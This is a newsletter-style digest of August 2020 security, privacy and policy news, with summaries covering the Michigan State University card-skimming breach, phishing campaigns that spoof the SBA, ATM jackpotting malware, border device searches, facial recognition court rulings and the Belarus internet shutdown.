Michigan State University is investigating how hackers were able to steal credit card data from the school's online shopping site over a nine-month period. The skimming, which took place between October 2019 and June, appears to have affected about 2,600 customers of the university's online store, shop.msu.edu, according to the school's Monday announcement. Exposed data included customers' names, addresses and credit card numbers, according to the university, which says it's working with law enforcement and attempting to determine the exact number victims. This skimming incident appears to be a Magecart-style attack, says Yonathan Klijnsma, a threat researcher at security firm RiskIQ, who has been tracking these types of attacks for the past several years.

Network intruders selling access to high-value companies

Breaching corporate networks and selling access to them is a business in and of itself. For many hackers, this is how they make their living, others do it forced by financial struggles to supplement their revenue. One actor claiming they returned to black hat activities after laying low for a while has recently churned out network access credentials for big and small companies across the world.

Hackers attack the Bundeswehr fleet service

The Bundestag administration has warned the parliamentarians of a potentially serious hacker attack on the Bundeswehr transport service. In the letter to the political groups of the Bundestag it is said that the BwFuhrpark reported that it had become a victim of a hacker attack. So far, the target, type and scope of the attack are still unknown. The hacker attack could well be delicate. The BwFurhpark, which is run by the Bundeswehr and operated by the Bahn, has been organizing the transport service for the Bundestag for several years.

US Seizes $2 Million in Cryptocurrency From Terrorist Groups

The seizure of bitcoins and other virtual currencies by the Justice Department - along with the FBI, Department of Homeland Security and IRS - is the federal government's largest seizure of cryptocurrency related to terrorism financing, according to Thursday's announcement. U.S. law enforcement also seized 300 cryptocurrency accounts, four websites and four Facebook pages all designed to raise funds for three terrorist organizations: ISIS, al Qaeda and the al Qassam Brigades, the military wing of Hamas. U.S. officials are also seeking to confiscate additional funds as investigations and forfeiture proceedings continue.

Texas Man Sentenced to 57 Months for Computer Hacking and Aggravated Identity Theft

Tyler C. King, age 31, of Dallas, Texas, was sentenced to 57 months in prison for computer fraud and aggravated identity theft in connection with his hacking of a New York-based technology company. The announcement was made by United States Attorney Grant C. Jaquith and Thomas F. Relford, Special Agent in Charge of the Albany Field Office of the Federal Bureau of Investigation (FBI). United States Attorney Grant C. Jaquith stated: "Tyler King hacked into a major technology company, damaged its systems, stole its data, and laughed about it, all from the comfort of his sofa in Texas. He will now serve 57 months in federal prison. Those interested in hiding behind their keyboards to steal information and damage property should take the sentence as a stark reminder that computer hacking is a serious business with serious consequences. I thank the FBI for its exceptional work in bringing King to justice."

Phishing Threat Preys on Desperate Business Owners

For the past few months, businesses across the nation have suffered from the financial strain brought on by COVID-19. Government relief has become a major concern as businesses struggle to stay afloat. The Cofense Phishing Defense Center (PDC) has taken notice of a new phishing campaign that once again aims to abuse Covid-related fear and uncertainty. This campaign imitates the U.S. Small Business Administration (SBA) to harvest the credentials of business owners who may be expecting the administration's assistance. While the spoofed address for this attack is one the SBA uses and is even listed on their website, one brief look at this example's "Received" path shows it did not originate from the SBA.

Phishing Campaign Spoofs SBA Loan Offer

Malwarebytes reports that a newly discovered phishing campaign is spoofing a U.S. Small Business Administration loan offer in an attempt to steal banking credentials and other personal data. This campaign appears to have started in early August, the security firm reports. Another phishing attack in April also used spoofed SBA messages, but it was created to spread a dropper called GuLoader, which is used to distribute other malware.

ATM Hackers Have Picked Up Some Clever New Tricks

During Black Hat, Kevin Perlow, the technical threat intelligence team lead at a large, private financial institution, analyzed two cash-out tactics that represent different current approaches to jackpotting. One looked at the ATM malware known as INJX~Pure~, first seen in spring 2019. INJX~Pure~ manipulates both the eXtensions for Financial Services (XFS) interface---which supports basic features on an ATM, like running and coordinating the PIN pad, card reader, and cash dispenser---and a bank's proprietary software together to cause jackpotting. The original malware samples were uploaded to scanners from Mexico and then later from Colombia, but little is known about the actors using INJX~Pure~. The malware is significant, though, because it is tailored to the ATMs of a specific bank, likely in a specific region, indicating that it can be worth it to develop even limited-use or targeted jackpotting malware rather than only focusing on tools that will work around the world.

Privacy

Homeland Security Details New Tools For Extracting Device Data at US Borders

Travelers heading to the US have many reasons to be cautious about their devices when it comes to privacy. A report released Thursday from the Department of Homeland Security provides even more cause for concern about how much data border patrol agents can pull from your phones and computers. From a report: In a Privacy Impact Assessment dated July 30, the DHS detailed its US Border Patrol Digital Forensics program, specifically for its development of tools to collect data from electronic devices. For years, DHS and border agents were allowed to search devices without a warrant, until a court found the practice unconstitutional in November 2019. In 2018, the agency searched more than 33,000 devices, compared to 30,200 searches in 2017 and just 4,764 searches in 2015. Civil rights advocates have argued against this kind of surveillance, saying it violates people's privacy rights.

Police Use of Facial Recognition Violates Human Rights, UK Court Rules

An appeals court ruled that police use of facial recognition technology in the UK has "fundamental deficiencies" and violates several laws. South Wales Police began using automated facial recognition technology on a trial basis in 2017, deploying a system called AFR Locate overtly at several dozen major events such as soccer matches. Police matched the scans against watchlists of known individuals to identify persons who were wanted by the police, had open warrants against them, or were in some other way persons of interest. In 2019, Cardiff resident Ed Bridges filed suit against the police, alleging that having his face scanned in 2017 and 2018 was a violation of his legal rights. Although he was backed by UK civil rights organization Liberty, Bridges lost his suit in 2019, but the Court of Appeal overturned that ruling, finding that the South Wales Police facial recognition program was unlawful.

TikTok Tracked User Data Using Tactic Banned By Google

TikTok skirted a privacy safeguard in Google's Android operating system to collect unique identifiers from millions of mobile devices, data that allows the app to track users online without allowing them to opt out, a Wall Street Journal analysis has found. The tactic, which experts in mobile-phone security said was concealed through an unusual added layer of encryption, appears to have violated Google policies limiting how apps track people and wasn't disclosed to TikTok users. TikTok ended the practice in November, the Journal's testing showed.

TSA considers new system for flyers without ID

According to a solicitation to potential contractors published last week, the Transportation Security Administration (TSA) wants to outsource its current questioning of airline passengers without ID, and its decisions about which travelers without ID to allow to travel and which to prevent from flying, to a fee-based system operated through a cellphone app provided by a private contractor and based on (secret) commercial databases. There's some good news and some bad news in the TSA's posting of this Request for Information.

Clearview AI landed a new facial recognition contract with ICE

The controversial facial recognition software maker Clearview AI has a new contract with ICE, the most controversial U.S. government agency. Clearview was already known to work with the branch of Homeland Security fiercely criticized for implementing the Trump administration's harsh immigration policies. The new contract makes it clear that relationship is ongoing --- and that Clearview isn't just playing a bit part in tech's lucrative scrum for federal contracts. First spotted by tech watchdog Tech Inquiry, the new contract is worth $224,000 and will provide the agency with what is only described as "Clearview licenses," likely just access to the company's software services.

Medical records for more than 61,000 cardiac patients left unsecured online

On August 2, a researcher contacted DataBreaches.net about a misconfigured Amazon s3 storage bucket they had discovered. The bucket contained more than 60,000 records, recently updated, with protected health information of patients seen by or involved with BioTel Heart cardiac data network. Sometimes it is easy to figure out the likely owner of an Amazon storage bucket. Other times, it's difficult or just downright impossible. This one was somewhat difficult to determine ownership for, even though they all related to BioTel Heart. The records were scanned faxes that seemed to involve BioTel Heart seeking medical records on patients that had been referred to them by providers. BioTel was requesting the patients' records because their claims for insurance reimbursement had been denied and they needed more records to support their appeal of denied benefits.

A simple telephony honeypot received 1.5 million robocalls across 11 months

In an award-winning paper presented at the USENIX security conference this week, a team of academics from North Carolina State University presented a list of findings from operating a massive telephony honeypot for 11 months for the sole purpose of tracking, identifying, and analyzing the robocalling phenomenon in the US. NCSU researchers said they ran 66,606 telephone lines between March 2019 and January 2020, during which time they said to have received 1,481,201 unsolicited calls -- even if they never made their phone numbers public via any source. The research team said they usually received an unsolicited call every 8.42 days, but most of the robocall traffic came in sudden surges they called "storms" that happened at regular intervals, suggesting that robocallers operated using a tactic of short-burst and well-organized campaigns.

Leaked Documents Reveal What TikTok Shares with Authorities — in the U.S.

Documents published in the BlueLeaks trove, which was hacked by someone claiming a connection to Anonymous and published by the transparency collective Distributed Denial of Secrets, show the information that TikTok shared with U.S. law enforcement in dozens of cases. The documents also reveal that two representatives with bytedance.com email addresses registered on the website of the Northern California Regional Intelligence Center, a fusion center that covers the Silicon Valley area. And they show that the Federal Bureau of Investigation and Department of Homeland Security actively monitored TikTok for signs of unrest during the George Floyd protests.

Politics

YouTube Bans Videos Containing Hacked Information That Could Interfere With the Election

As Democrats and Republicans prepare to hold their national conventions starting next week, YouTube on Thursday announced updates to its policies on deceptive videos and other content designed to interfere with the election. The world's largest video platform, with more than 2 billion users a month, will ban videos containing information that was obtained through hacking and could meddle with elections or censuses. That would include material like hacked campaign emails with details about a candidate. The update follows the announcement of a similar rule that Google, which owns YouTube, unveiled earlier this month banning ads that contain hacked information. Google will start enforcing that policy Sept. 1. YouTube also said it will take down videos that encourage people to interfere with voting and other democratic processes. For example, videos telling people to create long lines at polling places in order to stifle the vote won't be allowed.

Belarus has shut down the internet amid a controversial election

Internet connectivity and cellular service in Belarus have been down since Sunday evening, after sporadic outages early that morning and throughout the day. The connectivity blackout, which also includes landline phones, appears to be a government-imposed outage that comes amid widespread protests and increasing social unrest over Belarus' presidential election Sunday. The ongoing shutdown has further roiled the country of about 9.5 million people, where official election results this morning indicated that five-term president Aleksandr Lukashenko had won a sixth term with about 80 percent of the vote. Around the country, protests against Lukashenko's administration, including criticisms of his foreign policy and handling of the Covid-19 pandemic, grew in the days leading up to the election and exploded on Sunday night. The government has responded to the protests by mobilizing police and military forces, particularly in Minsk, the capital. Meanwhile, opposition candidates and protesters say the election was rigged and believe the results to be illegitimate.

The Clean Network – United States Department of State

The Clean Network program is the Trump Administration's comprehensive approach to safeguarding the nation's assets including citizens' privacy and companies' most sensitive information from aggressive intrusions by malign actors, such as the Chinese Communist Party. The Clean Network addresses the long-term threat to data privacy, security, human rights and principled collaboration posed to the free world from authoritarian malign actors. The Clean Network is rooted in internationally accepted digital trust standards. It represents the execution of a multi-year, all-of-government, enduring strategy, built on a coalition of trusted partners, and based on rapidly changing technology and economics of global markets.

Misc

Internet disruption hits Belarus on election day

Network telemetry from the NetBlocks internet observatory confirm that internet connectivity in Belarus has been partially disrupted as of Sunday 9 August 2020 amidst presidential elections.

Mozilla Fires Servo Devs and Security Response Teams

The Mozilla Corporation announced that it was laying off approximately 250 staff members in a move to shore up the organization's financial future. The layoffs were publicly announced in a blog post . Employees were notified hours before, earlier this morning, via an email sent by Mitchell Baker, Mozilla Corporation CEO and Mozilla Foundation Chairwoman. In a twitter post Michael Purzynski said they killed the entire threat management team so now Mozilla is without a detection and incident response.

NSA Owns Everything (2015)

As the Snowden leaks continue to dribble out, it has become increasingly obvious that most nations planning for "cyber-war" have been merely sharpening knives for what looks like an almighty gunfight. We have to ask ourselves a few tough questions, the biggest of which just might be: "If the NSA was owning everything in sight (and by all accounts they have) then how is it that nobody ever spotted them?"

FireEye’s bug bounty program goes public

On Wednesday, the cybersecurity firm said the scheme is now open to any researcher or bug bounty hunter willing to take a look at in-scope FireEye domains and services. Bug bounty programs, hosted on platforms including HackerOne and Bugcrowd, are a way to 'crowdsource' the hunt for vulnerabilities. Thousands of organizations now offer bug bounties to researchers who privately disclose security flaws they find through these programs and provide both financial rewards and credit in return.

Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw

Ziggo has informed customers that an expert had found a weakness in the Wifibooster Ziggo C7, a device used to strengthen WiFi signals. But the problem is the emails looks like phishing and has made customers suspicious.

Why & Where You Should You Plant Your Flag

As KrebsOnSecurity observed back in 2018, many people --- particularly older folks --- proudly declare they avoid using the Web to manage various accounts tied to their personal and financial data --- including everything from utilities and mobile phones to retirement benefits and online banking services. From that story: "The reasoning behind this strategy is as simple as it is alluring: What's not put online can't be hacked. But increasingly, adherents to this mantra are finding out the hard way that if you don't plant your flag online, fraudsters and identity thieves may do it for you."

Stalkerware Phone Spying Apps Have Escaped Google's Ad Ban

Several companies offering phone-spying apps - known as "stalkerware" are still advertising in Google search results, despite the search giant's ban that took effect , TechCrunch has found. These controversial apps are often pitched to help parents snoop on their child's calls, messages, apps and other private data under the guise of helping to protect against online predators. But some repurpose these apps to spy on their spouses - often without their permission. It's a problem that the wider tech industry has worked to tackle. Security firms and antivirus makers are working to combat the rise of stalkerware, and federal authorities have taken action when app makers have violated the law.

Zoom Sued By Consumer Group For Misrepresenting Its Encryption Protections

A consumer advocacy group is suing Zoom and seeking millions of dollars in damages, accusing the company of misleading its users about the strength of its encryption protections. From a report: The nonprofit group Consumer Watchdog is also accusing the videoconferencing company of deceiving users about the extent of its links with China and the fact that some calls between people in North America were routed through servers in China. That raises the danger Beijing could steal or demand access to the contents of those calls, according to a copy of the lawsuit, which was shared exclusively with The Cybersecurity 202.

Threema joins the ranks of E2EE chat apps that support encrypted video calls

Secure instant messaging app Threema has rolled out support this week for end-to-end encrypted (E2EE) video calls for its mobile applications. Monday's update brings the app in the elite echelon of instant messaging applications that support secure encrypted video calls, together with the likes of Signal, WhatsApp, Wickr, and Wire. Secure E2EE instant messaging applications still lacking support for this feature include Keybase (recently acquired by Zoom) and Telegram (which promised to have it ready by the end of 2020). Threema said the new E2EE video calling feature is based on the WebRTC streaming protocol, the same technology that's also included with all major browsers today, and which is also at the base of many video streaming applications. The difference is that Threema's implementation encrypts video calls between users' devices, using locally stored encryption keys. This prevents man-in-the-middle attacks, where attackers might want to intercept calls.

Plymouth Passport Office’s pitiful password privacy

The Home Office has confirmed there has been "no security breach" after a password was displayed in the window of Plymouth's Passport Office building. The staff password could be seen written on a flipchart and propped up against a window at the HM Passport Office building, clearly visible to passersby at the weekend. Some concerned residents got in touch to say it was "worrying" people "dealing with matters of national security" appeared to be using an easy-to-guess password, and that the password could be easily spotted when walking past the passport office in Plymouth city centre. A spokesperson from the Home Office has confirmed to PlymouthLive the password, "Passw0rd1," is indeed used by staff.

Windows Defender deletes Citrix components mislabeled as malware

Citrix released an advisory on Thursday about troublesome Windows Defender definition updates that break Delivery Controllers and Cloud Connectors running Microsoft's antivirus. The issue is due to Windows Defender misidentifying as malicious and quarantining the main and secondary Citrix broker services (BrokerService.exe and HighAvailabilityService.exe) responsible for tracking current user connections/sessions. Both files were erroneously detected as the information-stealing malware Agent Tesla and sent to isolation.

Expired certificate led to an undercount of COVID-19 results

An expired certificate and outage led to an undercounting of COVID-19 cases reported in California after 250,00-300,000 lab results were prevented from being uploaded to California's CalREDIE reporting system. CalREDIE is a data system created by California to report and monitor cases of infectious disease. Using this system, California can more easily spot outbreaks and incidents of community spread as it moves forward with the plans to open schools. On July 25th, a data outage prevented the CalREDIE system from accepting lab results from external partners. A temporary fix was put into place but was not removed properly, which led to further problems. In addition to the outage, a certificate expired that prevented lab partners like Quest from uploading California lab results to the data system. These problems ultimately led to a backlog of 250,000-300,000 results and an underreporting of COVID-19 cases.

Signal adds message requests to stop spam and protect user privacy

Secure instant messaging app Signal has rolled out a new feature called Message Requests that lets users approve or block who can contact them via text or voice call, or when they can be added to group chats. With Signal adoption growing in recent years due to its reputation as a secure communications channel with robust end-to-end encryption (E2EE), the app is bound to see its fair share of spammers in the coming future.

Boeing 747s receive software updates over floppy disks

Boeing 747-400s still use floppy disks for loading critical navigation databases, Pen Test Partners has revealed to the infosec community after poking about one of the recently abandoned aircraft. The eye-catching factoid emerged during a DEF CON video interview of PTP's Alex Lomas, where the man himself gave a walkthrough of a 747-400, its avionics bay and the flight deck. Although airliners are not normally available to curious infosec researchers, a certain UK-based Big Airline's decision to scrap its B747 fleet gave Pen Test Partners a unique opportunity to get aboard one and have a poke about before the scrap merchants set about their grim task.